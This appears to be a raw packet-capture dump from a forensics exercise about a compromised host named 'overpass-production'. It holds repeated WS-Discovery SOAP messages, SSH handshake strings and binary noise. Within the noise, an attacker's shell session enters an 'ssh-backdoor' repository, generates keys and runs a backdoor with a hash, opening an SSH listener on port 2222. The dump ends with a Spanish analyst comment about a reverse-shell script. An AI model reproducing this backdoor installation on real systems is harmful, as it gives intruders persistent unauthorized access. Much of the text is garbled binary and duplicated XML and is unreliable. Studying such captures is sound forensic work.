Unpacking objects: 33% (6/18)
Unpacking objects: 38% (7/18)
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>#Ro>
N+7,
PF_q
%Z.f)
rmO{
PP!"
mNvW
)Jo!
(0-g
N.4t
AOfty
VI~d
+qE
Eremote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 44% (8/18)
Unpacking objects: 50% (9/18)
Unpacking objects: 55% (10/18)
Unpacking objects: 61% (11/18)
Unpacking objects: 66% (12/18)
Unpacking objects: 72% (13/18)
Unpacking objects: 77% (14/18)
Unpacking objects: 83% (15/18)
Unpacking objects: 88% (16/18)
Unpacking objects: 94% (17/18)
Unpacking objects: 100% (18/18)
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa
id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production
The key's randomart image is:
+---[RSA 2048]----+
| .. . |
| . + |
| o .=. |
| . o o+. |
| + S +. |
| =.o %. |
| ..*.% =. |
| .+.X+*.+ |
| .oo=++=Eo. |
+----[SHA256]-----+
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
chmod +x backdoor
james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
cZHD
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib
ssh-rsa
w(-z
^%B|
^f&
c|#P
q&{
ssh-rsa
IFw1
?NK2
@Y!!
SSH-2.0-OpenSSH_8.2p1 Debian-4
SSH-2.0-OpenSSH_8.2p1 Debian-4
qcurve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1
ssh-rsa
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Uaes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
Bhmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96
none
none
curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c
ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,sk-ecdsa-sha2-nistp256-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,sk-ssh-ed25519-cert-v01@openssh.com,rsa-sha2-512-cert-v01@openssh.com,rsa-sha2-256-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com,ssh-ed25519,sk-ssh-ed25519@openssh.com,rsa-sha2-512,rsa-sha2-256,ssh-rsa
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
lchacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
none,zlib@openssh.com,zlib
none,zlib@openssh.com,zlib
&@FN
ssh-rsa
w(-z
^%B|
^f&
c|#P
ssh-rsa
O0VN
ywI`
!TKe
CzJ<#B
kG9-
%5kT
%=['
!S.F
]S-vl
:r6<|
!Kg%
`4C+
$~T\
x9~Pf
HZ!I
QX}$
BLWQ@
^hq_
<<lE
<Xz
3)qtU
yHQ[
H|GfC.
cHSy
G0II
nrg4
Y=_D
>^/!%
uD$<H.
s%<w
EB;g}
Rm6tQ
404N
_oOT
MDL\h]"
DzWA
W<G8}N
T8?GJ/R8$
lnc2?
E\F?Vjm
)Ld u
y;7g
QyI\
sWoT
hPjm
k[K6H
Y 08e
%)2Ma
<:rdzK
~6GN
&bKr?
G#+Z
J1<i
qqLF
357t
N|aN
j@Or
]ahD
*lK,
:Pm=U
7H>Q
%8 V
Os!X
Q_,MI
!bKA"
z2 {
i~#:
:4W>
c15$
\8K
_|z>
vy43
F%1o
K5jZ
!wmk
1K7:
Z*;?
zhR#\9r
QE^(6
\0e
F)%r
l L1O
?z0+
#U&\
ERrO]
49>g
wfir
sv~7
#S)h4
(`pe0
]f5C
;JRy
Jxxw
\ g|Y&
&fN6
wNHvyY
O2/;x
QO+l
n"XT
-)ONm
Y/'5
dCT>
&mGW
/k>U
2j+/q
%V2i
gsMD
M#i/_
4gBt
c=yK
}%63
)=&!
.b$1
BUSACMOS A VER SI PODEMOS VER SI CON CAT MOSTRO O VIO EL ATANTE SU SCRIPT DE REVERSE SHELL; PERO PARECE QUE NO E HISO CAT, SOLO VIMOS UN CAT SOBRE .OVERPASS (cat .overpass ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.):
